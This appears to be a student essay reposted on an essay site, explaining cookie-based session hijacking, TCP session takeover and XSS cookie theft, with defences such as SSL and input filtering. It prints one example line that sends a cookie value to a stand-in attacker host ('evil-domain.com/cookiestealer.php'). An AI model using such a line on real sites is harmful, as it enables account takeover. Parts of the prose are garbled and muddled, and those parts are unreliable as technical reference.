Any opinions, findings, conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of UKEssays.com.
Generally the most common way of tracking a user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out.
Session hijacking term means the exploitation of presently running session. Sometimes it is often referred as session key, it is used to gain the unauthorized gain to a system or to exploit services in the a computer. When a magic cookie which is used to authenticate the user to the server is stolen and used for the unauthorized purse is referred as session hijacking. Generally it is relevant to the web developers, as HTTP cookies are used to maintain the session on a site can be easily stolen by an attacker or the attacker can utilize by gaining access to the computer where the he can find the saved cookies.
When the user runs a machine, the machine stores a small text file which is called as a cookie. Cookies are plain text, they do not contain any executable codes
A web page or sever instructs a particular browser to store the information and sent it back whenever there is a request based on certain rules. Majority of sites identifies the users by these cookies. A user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out.
Session hijacking in TCP
In the session hijacking in TCP, the attacker takes over the TCP session between the two computers. As the most of the authentication is done at the starting of the session, this allows the hacker to gain over the machines.
One of the common methods used is source- routed of IP packets. It is generally middle in the middle kind of a attack, where a hacker a point B intercepts the conversation between the A and C by encouraging the packets to pass through the attackers machine.
Even though the source routing is turned off, the attacker can use a method called blind hijacking, where the attacker tries to guess the response between the two machines. If he is successful, then the hacker sends a command but he can never see the response but however a common command is like password, which allows to access from some other place on the network.
One of the purposes of such an attack is to cause the denial of service attack at one end point so that it will not respond. This attack can force the machine to crash or it can force the network connection for heavy packet loss.
The main problem with this kind of a system is that it leaves the user identification at a single data point and more over the cookies sent over the internet is in the form of plain text, which makes it to highly vulnerable to packet sniffing, where hacker intercepts the conversation between the network and the computer. One the user login cookie is stolen; it can be used to run the similar session at a distinct place by manually setting the cookie.
Because the server canââ‚¬â„¢t differentiate between a original cookie and a duplicated cookie which was modified by the attacker through the packet sniffing, so it shows as if the user is logged on. This type of attack is generally referred as session hijacking. To prevent session hijacking using cookies there are few methods.
The first one is, sending the cookies over the SSL; this is a common method technique. SSL uses the encryption method for the request on the site before responding across the internet and cookie value cannot be solely determined by the sniffing. The banks and stores generally use this method frequently since most of the session is for short duration of time.
Another method is to generate the session key randomly or which is based on the information of the user such as login id, IP address, and time when he logged in etc. It makes the session key un- usable, though it is possible.
The other way is to revalidate the particular user before performing assigned to a higher security level, such as, many sites as for login information for the second time before modifying the password.
document.cookie=”name=prahald; domain=nczonline.net; path=/”;
just by modifying the values of document.cookie does not delete the cookie. It just either creates or modifies the particular string. So that whenever the next request is made to the server, these cookies are sent along the set cookie.
This is the reason why, we need to compulsory make a cookie string manually as an original cookie
Cookie stealing and XSS
For example, it can be dangerous , if a person lodes a script from evil-domain.com which consists of some useful codes. However, users at evil-domain.com can switch that code to the following:
(new Image()).src = “http://www.evil-domain.com/cookiestealer.php?cookie=” + cookie.domain;
Cookie theft doesââ‚¬â„¢nt occur by just injecting a malicious scrip onto your page accidentally, it can also happen due to poor input filtering. Such as a page, where the user can enter the text, which is the output, onto the page. If the text consists of a script tag with the similar code as mentioned above then it is possible to steal the cookies
The cross site scripting attack has been used against large sites for example, live journal and MySpace. The best way to protect is of forms:
From all the user input the HTML should be filtered out. You should not accept any user input and outbound onto a page without filtering it.
Cite This Work
To export a reference to this article please select a referencing stye below:
Related ServicesView all
DMCA / Removal Request
If you are the original writer of this essay and no longer wish to have your work published on the UKDiss.com website then please: